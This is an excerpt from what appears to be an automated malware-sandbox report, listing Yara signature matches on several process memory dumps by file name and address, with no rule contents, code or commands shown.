Source: Yara match	File source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY